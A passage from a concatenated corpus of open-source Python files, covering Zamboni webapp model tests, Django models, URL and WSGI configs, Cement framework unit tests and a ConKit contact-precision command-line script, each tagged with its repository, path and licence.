# Spot check a few of the key properties.
mapping = WebappIndexer.get_mapping()
keys = mapping['webapp']['properties'].keys()
for k in ('id', 'app_slug', 'category', 'default_locale',
'description', 'device', 'features', 'name', 'status'):
ok_(k in keys, 'Key %s not found in mapping properties' % k)
def _get_doc(self):
qs = Webapp.indexing_transformer(
Webapp.objects.no_cache().filter(id__in=[self.app.pk]))
obj = qs[0]
return obj, WebappIndexer.extract_document(obj.pk, obj)
def test_extract(self):
obj, doc = self._get_doc()
eq_(doc['id'], obj.id)
eq_(doc['app_slug'], obj.app_slug)
eq_(doc['category'], [])
eq_(doc['default_locale'], obj.default_locale)
eq_(doc['description'], list(
set(s for _, s in obj.translations[obj.description_id])))
eq_(doc['device'], [])
eq_(doc['name'], list(
set(s for _, s in obj.translations[obj.name_id])))
eq_(doc['status'], obj.status)
eq_(doc['is_escalated'], False)
eq_(doc['latest_version']['status'], amo.STATUS_PUBLIC)
eq_(doc['latest_version']['has_editor_comment'], False)
eq_(doc['latest_version']['has_info_request'], False)
def test_extract_category(self):
cat = Category.objects.create(name='c', type=amo.ADDON_WEBAPP)
AddonCategory.objects.create(addon=self.app, category=cat)
obj, doc = self._get_doc()
eq_(doc['category'], [cat.slug])
def test_extract_device(self):
device = DEVICE_TYPES.keys()[0]
AddonDeviceType.objects.create(addon=self.app, device_type=device)
obj, doc = self._get_doc()
eq_(doc['device'], [device])
def test_extract_features(self):
enabled = ('has_apps', 'has_sms', 'has_geolocation')
self.app.current_version.features.update(
**dict((k, True) for k in enabled))
obj, doc = self._get_doc()
for k, v in doc['features'].iteritems():
eq_(v, k in enabled)
def test_extract_regions(self):
self.app.addonexcludedregion.create(region=mkt.regions.BR.id)
self.app.addonexcludedregion.create(region=mkt.regions.UK.id)
obj, doc = self._get_doc()
self.assertSetEqual(doc['region_exclusions'],
set([mkt.regions.BR.id, mkt.regions.UK.id]))
def test_extract_supported_locales(self):
locales = 'en-US,es,pt-BR'
self.app.current_version.update(supported_locales=locales)
obj, doc = self._get_doc()
self.assertSetEqual(doc['supported_locales'], set(locales.split(',')))
def test_extract_latest_version(self):
amo.tests.version_factory(addon=self.app, version='43.0',
has_editor_comment=True,
has_info_request=True,
file_kw=dict(status=amo.STATUS_REJECTED))
obj, doc = self._get_doc()
eq_(doc['latest_version']['status'], amo.STATUS_REJECTED)
eq_(doc['latest_version']['has_editor_comment'], True)
eq_(doc['latest_version']['has_info_request'], True)
def test_extract_is_escalated(self):
EscalationQueue.objects.create(addon=self.app)
obj, doc = self._get_doc()
eq_(doc['is_escalated'], True)
@mock.patch.object(mkt.regions.BR, 'ratingsbodies',
(mkt.ratingsbodies.PEGI,))
@mock.patch.object(mkt.ratingsbodies.PEGI, 'name', 'peggyhill')
@mock.patch.object(mkt.ratingsbodies.PEGI_12, 'name', '12+')
@mock.patch.object(mkt.ratingsbodies.PEGI_12, 'description', 'be old')
def test_extract_content_ratings(self):
# These ones shouldn't appear, outside region.
ContentRating.objects.create(
addon=self.app, ratings_body=mkt.ratingsbodies.CLASSIND.id,
rating=0)
ContentRating.objects.create(
addon=self.app, ratings_body=mkt.ratingsbodies.GENERIC.id,
rating=0)
# This one should appear in `gr` since we set Greece to use PEGI.
ContentRating.objects.create(
addon=self.app, ratings_body=mkt.ratingsbodies.PEGI.id,
rating=mkt.ratingsbodies.PEGI_12.id)
obj, doc = self._get_doc()
eq_(doc['content_ratings']['br'][0], {
'body': 'peggyhill',
'body_slug': 'peggyhill',
'name': '12+',
'slug': '12',
'description': unicode('be old')})
@mock.patch.object(mkt.regions.VE, 'ratingsbodies', ())
@mock.patch.object(mkt.regions.RS, 'ratingsbodies', ())
@mock.patch.object(mkt.ratingsbodies.GENERIC, 'name', 'genny')
@mock.patch.object(mkt.ratingsbodies.GENERIC_12, 'name', 'genny-name')
@mock.patch.object(mkt.ratingsbodies.GENERIC_12, 'description', 'g-desc')
def test_extract_content_ratings_generic_fallback(self):
# These ones shouldn't appear, they are associated w/ region.
ContentRating.objects.create(
addon=self.app, ratings_body=mkt.ratingsbodies.CLASSIND.id,
rating=0)
ContentRating.objects.create(
addon=self.app, ratings_body=mkt.ratingsbodies.PEGI.id,
rating=0)
# This one should appear in `generic` since we set Venezuela to not
# have a specified rating body so it falls back to a manually
# attached magical generic region.
ContentRating.objects.create(
addon=self.app, ratings_body=mkt.ratingsbodies.GENERIC.id,
rating=mkt.ratingsbodies.GENERIC_12.id)
obj, doc = self._get_doc()
eq_(doc['content_ratings']['generic'][0], {
'body': 'genny',
'body_slug': 'genny',
'name': 'genny-name',
'slug': 'genny-name',
'description': unicode('g-desc')})
# Make sure the content rating is shoved in the generic region,
# not the actual regions (it'd be redundant).
assert 'rs' not in doc['content_ratings']
assert 've' not in doc['content_ratings']
class TestRatingDescriptors(DynamicBoolFieldsTestMixin, amo.tests.TestCase):
def setUp(self):
super(TestRatingDescriptors, self).setUp()
self.model = RatingDescriptors
self.related_name = 'rating_descriptors'
self.BOOL_DICT = mkt.ratingdescriptors.RATING_DESCS
self.flags = ('USK_NO_DESCS', 'ESRB_VIOLENCE', 'PEGI_LANG',
'CLASSIND_DRUGS')
self.expected = [u'No Descriptors', u'Violence', u'Language', u'Drugs']
RatingDescriptors.objects.create(addon=self.app)
@mock.patch.dict('mkt.ratingdescriptors.RATING_DESCS',
USK_NO_DESCS={'name': _(u'H\xe9llo')})
def test_to_list_nonascii(self):
self.expected[0] = u'H\xe9llo'
self._flag()
to_list = self.app.rating_descriptors.to_list()
self.assertSetEqual(self.to_unicode(to_list), self.expected)
def test_desc_mapping(self):
descs = RatingDescriptors.objects.create(addon=app_factory())
for body, mapping in DESC_MAPPING.items():
for native, rating_desc_field in mapping.items():
assert hasattr(descs, rating_desc_field), rating_desc_field
def test_reverse_desc_mapping(self):
descs = RatingDescriptors.objects.create(addon=app_factory())
for desc in descs._fields():
eq_(type(REVERSE_DESC_MAPPING.get(desc)), unicode, desc)
def test_iarc_deserialize(self):
descs = RatingDescriptors.objects.create(
addon=app_factory(), has_esrb_blood=True, has_pegi_scary=True)
self.assertSetEqual(descs.iarc_deserialize().split(', '),
['Blood', 'Fear'])
eq_(descs.iarc_deserialize(body=mkt.ratingsbodies.ESRB), 'Blood')
class TestRatingInteractives(DynamicBoolFieldsTestMixin, amo.tests.TestCase):
def setUp(self):
super(TestRatingInteractives, self).setUp()
self.model = RatingInteractives
self.related_name = 'rating_interactives'
self.BOOL_DICT = mkt.ratinginteractives.RATING_INTERACTIVES
self.flags = ('SHARES_INFO', 'DIGITAL_PURCHASES', 'SOCIAL_NETWORKING')
self.expected = [u'Shares Info', u'Digital Purchases',
u'Social Networking']
RatingInteractives.objects.create(addon=self.app)
def test_interactives_mapping(self):
interactives = RatingInteractives.objects.create(addon=app_factory())
for native, field in INTERACTIVES_MAPPING.items():
assert hasattr(interactives, field)
def test_reverse_interactives_mapping(self):
interactives = RatingInteractives.objects.create(addon=app_factory())
for interactive_field in interactives._fields():
assert REVERSE_INTERACTIVES_MAPPING.get(interactive_field)
def test_iarc_deserialize(self):
interactives = RatingInteractives.objects.create(
addon=app_factory(), has_users_interact=True, has_shares_info=True)
self.assertSetEqual(
interactives.iarc_deserialize().split(', '),
['Shares Info', 'Users Interact'])
class TestManifestUpload(BaseUploadTest, amo.tests.TestCase):
fixtures = fixture('webapp_337141')
@mock.patch('mkt.webapps.models.parse_addon')
def test_manifest_updated_developer_name(self, parse_addon):
parse_addon.return_value = {
'version': '4.0',
'developer_name': u'Méâ'
}
# Note: we need a valid FileUpload instance, but in the end we are not
# using its contents since we are mocking parse_addon().
path = os.path.join(settings.ROOT, 'apps', 'devhub', 'tests',
'addons', 'mozball.webapp')
upload = self.get_upload(abspath=path, is_webapp=True)
app = Addon.objects.get(pk=337141)
app.manifest_updated('', upload)
version = app.current_version.reload()
eq_(version.version, '4.0')
eq_(version.developer_name, u'Méâ')
@mock.patch('mkt.webapps.models.parse_addon')
def test_manifest_updated_long_developer_name(self, parse_addon):
truncated_developer_name = u'é' * 255
long_developer_name = truncated_developer_name + u'ßßßß'
parse_addon.return_value = {
'version': '4.1',
'developer_name': long_developer_name,
}
# Note: we need a valid FileUpload instance, but in the end we are not
# using its contents since we are mocking parse_addon().
path = os.path.join(settings.ROOT, 'apps', 'devhub', 'tests',
'addons', 'mozball.webapp')
upload = self.get_upload(abspath=path, is_webapp=True)
app = Addon.objects.get(pk=337141)
app.manifest_updated('', upload)
version = app.current_version.reload()
eq_(version.version, '4.1')
eq_(version.developer_name, truncated_developer_name)
class TestGeodata(amo.tests.WebappTestCase):
def setUp(self):
super(TestGeodata, self).setUp()
self.geo = self.app.geodata
def test_app_geodata(self):
assert isinstance(Webapp(id=337141).geodata, Geodata)
def test_unicode(self):
eq_(unicode(self.geo),
u'%s (unrestricted): <Webapp 337141>' % self.geo.id)
self.geo.update(restricted=True)
eq_(unicode(self.geo),
u'%s (restricted): <Webapp 337141>' % self.geo.id)
def test_get_status(self):
eq_(self.geo.get_status(mkt.regions.CN), amo.STATUS_NULL)
eq_(self.geo.region_cn_status, amo.STATUS_NULL)
def test_set_status(self):
status = amo.STATUS_PUBLIC
# Called with `save=False`.
self.geo.set_status(mkt.regions.CN, status)
eq_(self.geo.region_cn_status, status)
eq_(self.geo.reload().region_cn_status, amo.STATUS_NULL,
'`set_status(..., save=False)` should not save the value')
# Called with `save=True`.
self.geo.set_status(mkt.regions.CN, status, save=True)
eq_(self.geo.region_cn_status, status)
eq_(self.geo.reload().region_cn_status, status)
|
Joergen/zamboni
|
mkt/webapps/tests/test_models.py
|
Python
|
bsd-3-clause
| 66,033
|
from __future__ import unicode_literals
from django.db import models
from django.db.models.signals import post_save
from django.utils.translation import ugettext_lazy as _
class TableMap(models.Model):
"""
Combines local tables with google fusion tables via
fusiontable table id and local name created from app_label
and model name.
"""
table_name = models.CharField(
max_length=255,
default='',
verbose_name=_("Local table name (<app_label>;<model__name>)")
)
ft_id = models.CharField(
max_length=255,
default='',
verbose_name=_("Fusiontable table id")
)
class KFTQuerySet(models.query.QuerySet):
"""
KFT Query Set. Contains overwritten update methods.
Update call post_save signal and pass to them required data.
Moreover, added '__raw' flag which works like a 'raw' flag from
base_save method.
"""
def update(self, **kwargs):
"""
Convert custom '__raw' flag to 'raw' flag from base_save.
Call post_save signal on update.
"""
raw = kwargs.get('__raw', False)
if raw:
del kwargs['__raw']
super(KFTQuerySet, self).update(**kwargs)
for instance in self._clone():
post_save.send(
sender=self.model,
instance=instance,
raw=raw
)
class KFTManager(models.Manager):
"""
KFT Manager. Required for modify update method from queryset.
Check out KFTQuerySet class.
"""
def get_queryset(self):
return KFTQuerySet(self.model, using=self._db)
class KFTModel(models.Model):
"""
Abstract base KFTModel. Add some required fields. Auto-synchronize
tables must inherit from this abstract class.
"""
class Meta:
abstract = True
objects = KFTManager()
_fusiontablesync = True
_ft_synced_at = models.DateTimeField(
blank=True,
null=True,
verbose_name=_("Date of the last synchronization")
)
_updated_at = models.DateTimeField(
blank=False,
null=False,
auto_now=True,
verbose_name=_("Date of the last update")
)
_ft_id = models.CharField(
max_length=255,
blank=True,
verbose_name=_("Google fusiontable row id")
)
# class TestModel1(KFTModel):
# test_field11 = models.CharField(max_length=255)
# test_field12 = models.CharField(max_length=255)
# class TestModel2(KFTModel):
# test_field21 = models.CharField(max_length=255)
# test_field22 = models.CharField(max_length=255)
|
kula1922/kfusiontables
|
kfusiontables/models.py
|
Python
|
bsd-3-clause
| 2,610
|
"""
WSGI config for DjangoChannel project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "Config.settings")
application = get_wsgi_application()
|
ivermac/DjangoChannel
|
Config/wsgi.py
|
Python
|
bsd-3-clause
| 396
|
from django.conf.urls.defaults import *
from django.views.generic.simple import redirect_to
from django.views.generic.simple import direct_to_template
from django.contrib.auth import views as auth_views
#from registration.views import activate
from profiles.views import userprofile_show
from profiles.views import search_user, xhr_search_user
from profiles.views import ranking
from profiles.views import change_description
from profiles.views.votes import compare_votes_to_user
from profiles.views.votes import record_vote_on_user
from registration.views import register
from registration.views import activate
urlpatterns = patterns('',
#search
url(r'^search/$', search_user, name='search_user'),
url(r'^xhr_search/$', xhr_search_user, name='xhr_search_user'),
#ranking
url(r'^ranking/$', ranking, name='ranking'),
# views dealing with users.
url(r'^compare_votes_to_user/(?P<username>\w+)/$', compare_votes_to_user,
name='compare_votes_to_user',),
url(r'^vote/(?P<user_id>\d+)$', record_vote_on_user, name='vote_user'),
# profile and account management urls.
url(r'^userprofile/(?P<username>\w+)/$', userprofile_show,
name='userprofile',),
url(r'^changedescription/$', change_description,
name='change_description',),
# Registration views.
url(r'^activate/(?P<activation_key>\w+)/$',
activate,
{'backend': 'registration.backends.default.DefaultBackend', } ,
name='registration_activate',
),
url(r'^register/$',
register,
{'backend': 'registration.backends.default.DefaultBackend' } ,
name='registration_register'),
url(r'^register/complete/$',
direct_to_template,
{'template': 'registration/registration_complete.html'},
name='registration_complete'),
url(r'^activation/complete/$',
direct_to_template,
{'template': 'registration/activation_complete.html'},
name='registration_activation_complete'),
# basic login logout
url(r'^login/$', auth_views.login, {'template_name': 'profiles/login.html'},
name='auth_login'),
url(r'^logout/$', auth_views.logout, {'template_name': 'profiles/logout.html'},
name='logout'),
# password service.
url(r'^password/change/$', auth_views.password_change, name='auth_password_change'),
url(r'^password/change/done/$', auth_views.password_change_done,
name='auth_password_change_done'),
url(r'^password/reset/$', auth_views.password_reset,
name='auth_password_reset'),
url(r'^password/reset/confirm/(?P<uidb36>[0-9A-Za-z]+)-(?P<token>.+)/$',
auth_views.password_reset_confirm,
name='auth_password_reset_confirm'),
url(r'^password/reset/complete/$', auth_views.password_reset_complete,
name='auth_password_reset_complete'),
url(r'^password/reset/done/$', auth_views.password_reset_done,
name='auth_password_reset_done'),
)
|
spreeker/democracygame
|
democracy/profiles/urls.py
|
Python
|
bsd-3-clause
| 2,960
|
"""Tests for cement.core.setup."""
import os
import sys
import json
import signal
from time import sleep
from cement.core import foundation, exc, backend, config, extension, plugin
from cement.core.handler import CementBaseHandler
from cement.core.controller import CementBaseController, expose
from cement.core import log, output, hook, arg, controller
from cement.core.interface import Interface
from cement.utils import test
from cement.core.exc import CaughtSignal
from cement.utils.misc import init_defaults, rando, minimal_logger
from nose.plugins.attrib import attr
APP = rando()[:12]
def my_extended_func():
return 'KAPLA'
class DeprecatedApp(foundation.CementApp):
class Meta:
label = 'deprecated'
defaults = None
class HookTestException(Exception):
pass
class MyTestInterface(Interface):
class IMeta:
label = 'my_test_interface'
class MyTestHandler(CementBaseHandler):
class Meta:
label = 'my_test_handler'
interface = MyTestInterface
class TestOutputHandler(output.CementOutputHandler):
file_suffix = None
class Meta:
interface = output.IOutput
label = 'test_output_handler'
def _setup(self, config_obj):
self.config = config_obj
def render(self, data_dict, template=None):
return None
class BogusBaseController(controller.CementBaseController):
class Meta:
label = 'bad_base_controller_label'
def my_hook_one(app):
return 1
def my_hook_two(app):
return 2
def my_hook_three(app):
return 3
class FoundationTestCase(test.CementCoreTestCase):
def setUp(self):
super(FoundationTestCase, self).setUp()
self.app = self.make_app('my_app')
def test_argv_is_none(self):
app = self.make_app(APP, argv=None)
app.setup()
self.eq(app.argv, list(sys.argv[1:]))
def test_framework_logging_is_true(self):
del os.environ['CEMENT_FRAMEWORK_LOGGING']
app = self.make_app(APP, argv=None, framework_logging=True)
app.setup()
self.eq(os.environ['CEMENT_FRAMEWORK_LOGGING'], '1')
ml = minimal_logger(__name__)
self.eq(ml.logging_is_enabled, True)
def test_framework_logging_is_false(self):
del os.environ['CEMENT_FRAMEWORK_LOGGING']
app = self.make_app(APP, argv=None, framework_logging=False)
app.setup()
self.eq(os.environ['CEMENT_FRAMEWORK_LOGGING'], '0')
ml = minimal_logger(__name__)
self.eq(ml.logging_is_enabled, False)
# coverage... should default to True if no key in os.environ
del os.environ['CEMENT_FRAMEWORK_LOGGING']
self.eq(ml.logging_is_enabled, True)
def test_bootstrap(self):
app = self.make_app('my_app', bootstrap='tests.bootstrap')
app.setup()
self.eq(app._loaded_bootstrap.__name__, 'tests.bootstrap')
def test_reload_bootstrap(self):
app = self.make_app('my_app', bootstrap='cement.utils.test')
app._loaded_bootstrap = test
app.setup()
self.eq(app._loaded_bootstrap.__name__, 'cement.utils.test')
def test_argv(self):
app = self.make_app('my_app', argv=['bogus', 'args'])
self.eq(app.argv, ['bogus', 'args'])
@test.raises(exc.FrameworkError)
def test_resolve_handler_bad_handler(self):
class Bogus(object):
pass
try:
self.app._resolve_handler('output', Bogus)
except exc.FrameworkError as e:
self.ok(e.msg.find('resolve'))
raise
def test_default(self):
self.app.setup()
self.app.run()
def test_passed_handlers(self):
from cement.ext import ext_configparser
from cement.ext import ext_logging
from cement.ext import ext_argparse
from cement.ext import ext_plugin
from cement.ext import ext_dummy
# forces CementApp._resolve_handler to register the handler
from cement.ext import ext_json
app = self.make_app('my-app-test',
config_handler=ext_configparser.ConfigParserConfigHandler,
log_handler=ext_logging.LoggingLogHandler(),
arg_handler=ext_argparse.ArgParseArgumentHandler(),
extension_handler=extension.CementExtensionHandler(),
plugin_handler=ext_plugin.CementPluginHandler(),
output_handler=ext_json.JsonOutputHandler(),
mail_handler=ext_dummy.DummyMailHandler(),
argv=[__file__, '--debug']
)
app.setup()
def test_debug(self):
app = self.make_app('my-app-test', argv=[__file__])
app.setup()
self.eq(app.debug, False)
self.reset_backend()
app = self.make_app('my-app-test', argv=[__file__, '--debug'])
app.setup()
self.eq(app.debug, True)
self.reset_backend()
defaults = init_defaults('my-app-test')
defaults['my-app-test']['debug'] = True
app = self.make_app('my-app-test', argv=[__file__],
config_defaults=defaults)
app.setup()
self.eq(app.debug, True)
def test_render(self):
# Render with default
self.app.setup()
self.app.render(dict(foo='bar'))
# Render with no output_handler... this is hackish, but there are
# circumstances where app.output would be None.
app = self.make_app('test', output_handler=None)
app.setup()
app.output = None
app.render(dict(foo='bar'))
def test_render_out_to_file(self):
self.app = self.make_app(APP, extensions=['json'],
output_handler='json')
self.app.setup()
self.app.run()
f = open(self.tmp_file, 'w')
self.app.render(dict(foo='bar'), out=f)
f.close()
f = open(self.tmp_file, 'r')
data = json.load(f)
f.close()
self.eq(data, dict(foo='bar'))
@test.raises(TypeError)
def test_render_bad_out(self):
self.app.setup()
self.app.run()
try:
self.app.render(dict(foo='bar'), out='bogus type')
except TypeError as e:
self.eq(e.args[0], "Argument 'out' must be a 'file' like object")
raise
@test.raises(exc.FrameworkError)
def test_bad_label(self):
try:
app = foundation.CementApp(None)
except exc.FrameworkError as e:
# FIX ME: verify error msg
raise
@test.raises(exc.FrameworkError)
def test_bad_label_chars(self):
try:
app = foundation.CementApp('some!bogus()label')
except exc.FrameworkError as e:
self.ok(e.msg.find('alpha-numeric'))
raise
def test_add_arg_shortcut(self):
self.app.setup()
self.app.add_arg('--foo', action='store')
def test_reset_output_handler(self):
app = self.make_app('test', argv=[], output_handler=TestOutputHandler)
app.setup()
app.run()
app.output = None
app._meta.output_handler = None
app._setup_output_handler()
def test_lay_cement(self):
app = self.make_app('test', argv=['--quiet'])
def test_none_member(self):
class Test(object):
var = None
self.app.setup()
self.app.args.parsed_args = Test()
try:
self.app._parse_args()
except SystemExit:
pass
@test.raises(exc.CaughtSignal)
def test_cement_signal_handler(self):
import signal
import types
global app
app = self.make_app('test')
frame = sys._getframe(0)
try:
foundation.cement_signal_handler(signal.SIGTERM, frame)
except exc.CaughtSignal as e:
self.eq(e.signum, signal.SIGTERM)
self.ok(isinstance(e.frame, types.FrameType))
raise
def test_cement_without_signals(self):
app = self.make_app('test', catch_signals=None)
app.setup()
def test_extend(self):
self.app.extend('kapla', my_extended_func)
self.eq(self.app.kapla(), 'KAPLA')
@test.raises(exc.FrameworkError)
def test_extended_duplicate(self):
self.app.extend('config', my_extended_func)
def test_no_handler(self):
app = self.make_app(APP)
app._resolve_handler('cache', None, raise_error=False)
def test_config_files_is_none(self):
app = self.make_app(APP, config_files=None)
app.setup()
label = APP
user_home = os.path.abspath(os.path.expanduser(os.environ['HOME']))
files = [
os.path.join('/', 'etc', label, '%s.conf' % label),
os.path.join(user_home, '.%s.conf' % label),
os.path.join(user_home, '.%s' % label, 'config'),
]
for f in files:
res = f in app._meta.config_files
self.ok(res)
@test.raises(exc.FrameworkError)
def test_base_controller_label(self):
app = self.make_app(APP, base_controller=BogusBaseController)
app.setup()
def test_pargs(self):
app = self.make_app(argv=['--debug'])
app.setup()
app.run()
self.eq(app.pargs.debug, True)
def test_last_rendered(self):
self.app.setup()
output_text = self.app.render({'foo': 'bar'})
last_data, last_output = self.app.last_rendered
self.eq({'foo': 'bar'}, last_data)
self.eq(output_text, last_output)
def test_get_last_rendered(self):
# DEPRECATED - REMOVE AFTER THE FUNCTION IS REMOVED
self.app.setup()
output_text = self.app.render({'foo': 'bar'})
last_data, last_output = self.app.get_last_rendered()
self.eq({'foo': 'bar'}, last_data)
self.eq(output_text, last_output)
def test_with_operator(self):
with self.app_class() as app:
app.run()
@test.raises(SystemExit)
def test_close_with_code(self):
app = self.make_app(APP, exit_on_close=True)
app.setup()
app.run()
try:
app.close(114)
except SystemExit as e:
self.eq(e.code, 114)
raise
@test.raises(AssertionError)
def test_close_with_bad_code(self):
self.app.setup()
self.app.run()
try:
self.app.close('Not An Int')
except AssertionError as e:
self.eq(e.args[0], "Invalid exit status code (must be integer)")
raise
def test_handler_override_options(self):
app = self.make_app(APP,
argv=['-o', 'json'],
extensions=['yaml', 'json'],
)
app.setup()
app.run()
self.eq(app._meta.output_handler, 'json')
def test_handler_override_options_is_none(self):
app = self.make_app(APP,
core_handler_override_options=None,
handler_override_options=None
)
app.setup()
app.run()
def test_handler_override_invalid_interface(self):
app = self.make_app(APP,
handler_override_options=dict(
bogus_interface=(['-f'], ['--foo'], {}),
)
)
app.setup()
app.run()
def test_handler_override_options_not_passed(self):
app = self.make_app(APP,
extensions=['yaml', 'json'],
)
app.setup()
app.run()
def test_suppress_output_while_debug(self):
app = self.make_app(APP, debug=True)
app.setup()
app._suppress_output()
def test_core_meta_override(self):
defaults = init_defaults(APP)
defaults[APP]['mail_handler'] = 'dummy'
app = self.make_app(APP, debug=True, config_defaults=defaults)
app.setup()
app.run()
def test_define_hooks_meta(self):
app = self.make_app(APP, define_hooks=['my_custom_hook'])
app.setup()
self.ok(hook.defined('my_custom_hook'))
@test.raises(HookTestException)
def test_register_hooks_meta(self):
def my_custom_hook_func():
raise HookTestException('OK')
app = self.make_app(APP,
define_hooks=['my_custom_hook'],
hooks=[('my_custom_hook', my_custom_hook_func)])
app.setup()
for res in hook.run('my_custom_hook'):
pass
def test_register_hooks_meta_retry(self):
# hooks registered this way for non-framework hooks need to be retried
# so we make sure it's actually being registered.
def my_custom_hook_func():
raise HookTestException('OK')
app = self.make_app(APP,
extensions=['watchdog'],
hooks=[
('watchdog_pre_start', my_custom_hook_func)
]
)
app.setup()
self.eq(len(app.hook.__hooks__['watchdog_pre_start']), 1)
def test_define_handlers_meta(self):
app = self.make_app(APP, define_handlers=[MyTestInterface])
app.setup()
self.ok(app.handler.defined('my_test_interface'))
def test_register_handlers_meta(self):
app = self.make_app(APP,
define_handlers=[MyTestInterface],
handlers=[MyTestHandler],
)
app.setup()
self.ok(app.handler.registered('my_test_interface',
'my_test_handler'))
def test_disable_backend_globals(self):
app = self.make_app(APP,
use_backend_globals=False,
define_handlers=[MyTestInterface],
handlers=[MyTestHandler],
define_hooks=['my_hook'],
)
app.setup()
self.ok(app.handler.registered('my_test_interface',
'my_test_handler'))
self.ok(app.hook.defined('my_hook'))
def test_reload(self):
with self.app as app:
app.hook.define('bogus_hook1')
app.handler.define(MyTestInterface)
app.extend('some_extra_member', dict())
app.run()
self.ok(app.hook.defined('bogus_hook1'))
self.ok(app.handler.defined('my_test_interface'))
app.reload()
self.eq(app.hook.defined('bogus_hook1'), False)
self.eq(app.handler.defined('my_test_interface'), False)
app.run()
@test.raises(AssertionError)
def test_run_forever(self):
class Controller(CementBaseController):
class Meta:
label = 'base'
@expose()
def runit(self):
raise Exception("Fake some error")
app = self.make_app(base_controller=Controller, argv=['runit'])
def handler(signum, frame):
raise AssertionError('It ran forever!')
# set the signal handler and a 5-second alarm
signal.signal(signal.SIGALRM, handler)
signal.alarm(5)
try:
# this will run indefinitely
with app as app:
app.run_forever()
except AssertionError as e:
self.eq(e.args[0], 'It ran forever!')
raise
finally:
signal.alarm(0)
def test_add_template_directory(self):
self.app.setup()
self.app.add_template_dir(self.tmp_dir)
res = self.tmp_dir in self.app._meta.template_dirs
self.ok(res)
def test_remove_template_directory(self):
self.app.setup()
self.app.add_template_dir(self.tmp_dir)
res = self.tmp_dir in self.app._meta.template_dirs
self.ok(res)
self.app.remove_template_dir(self.tmp_dir)
res = self.tmp_dir not in self.app._meta.template_dirs
self.ok(res)
def test_alternative_module_mapping(self):
# just to have something for coverage
app = self.make_app(alternative_module_mapping=dict(time='time'))
app.setup()
app.__import__('time')
app.__import__('sleep', from_module='time')
def test_meta_defaults(self):
DEBUG_FORMAT = "TEST DEBUG FORMAT - %s" % self.rando
META = {}
META['log.logging'] = {}
META['log.logging']['debug_format'] = DEBUG_FORMAT
app = self.make_app(meta_defaults=META)
app.setup()
self.eq(app.log._meta.debug_format, DEBUG_FORMAT)
|
akhilman/cement
|
tests/core/foundation_tests.py
|
Python
|
bsd-3-clause
| 16,592
|
#!/usr/bin/env python
#
# BSD 3-Clause License
#
# Copyright (c) 2016-21, University of Liverpool
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""This script calculates the precision score for a contact prediction
when compared against contacts extracted from a protein structure.
"""
__author__ = "Felix Simkovic"
__date__ = "21 Nov 2016"
__version__ = "0.13.1"
import argparse
import conkit.command_line
import conkit.io
logger = None
def main():
parser = argparse.ArgumentParser(description=__doc__, formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument(
"-c",
dest="pdbchain",
default=None,
help="PDB chain to use [default: first in file]. "
"Inter-molecular predictions use two letter "
"convention, i.e AD for contacts between A and D.",
)
parser.add_argument("-d", dest="dtn", default=5, type=int, help="Minimum sequence separation [default: 5]")
parser.add_argument(
"-f",
dest="dfactor",
default=1.0,
type=float,
help="number of contacts to include relative to sequence length [default: 1.0]",
)
parser.add_argument("pdbfile")
parser.add_argument("pdbformat", choices=['pdb', 'mmcif'])
parser.add_argument("seqfile")
parser.add_argument("seqformat")
parser.add_argument("confile")
parser.add_argument("conformat")
args = parser.parse_args()
global logger
logger = conkit.command_line.setup_logging(level="info")
if args.pdbchain:
pdb = conkit.io.read(args.pdbfile, args.pdbformat)[args.pdbchain]
else:
pdb = conkit.io.read(args.pdbfile, args.pdbformat)[0]
seq = conkit.io.read(args.seqfile, args.seqformat)[0]
pdb.sequence = seq
pdb.set_sequence_register()
pdb = pdb.as_contactmap()
con = conkit.io.read(args.confile, args.conformat)[0]
con.sequence = seq
con.set_sequence_register()
if args.conformat in conkit.io.DISTANCE_FILE_PARSERS:
con = con.as_contactmap()
logger.info("Min sequence separation for contacting residues: %d", args.dtn)
logger.info("Contact list cutoff factor: %f * L", args.dfactor)
con.remove_neighbors(min_distance=args.dtn, inplace=True)
ncontacts = int(seq.seq_len * args.dfactor)
con.sort("raw_score", reverse=True, inplace=True)
con_sliced = con[:ncontacts]
con_matched = con_sliced.match(pdb)
precision = con_matched.precision
logger.info("Precision score: %f", precision)
if __name__ == "__main__":
import sys
import traceback
try:
main()
sys.exit(0)
except Exception as e:
if not isinstance(e, SystemExit):
msg = "".join(traceback.format_exception(*sys.exc_info()))
logger.critical(msg)
sys.exit(1)
|
rigdenlab/conkit
|
conkit/command_line/conkit_precision.py
|
Python
|
bsd-3-clause
| 4,257
|
import json
from functools import wraps
from pkg_resources import resource_stream
from twisted.internet import reactor
from twisted.internet.defer import inlineCallbacks
from twisted.internet.protocol import Protocol, Factory
from twisted.trial.unittest import TestCase
from vumi.tests.helpers import VumiTestCase
from vumi.utils import HttpTimeoutError
from vumi_wikipedia.wikipedia_api import WikipediaAPI, ArticleExtract, APIError
class SectionMarkerCreator(object):
def __getitem__(self, key):
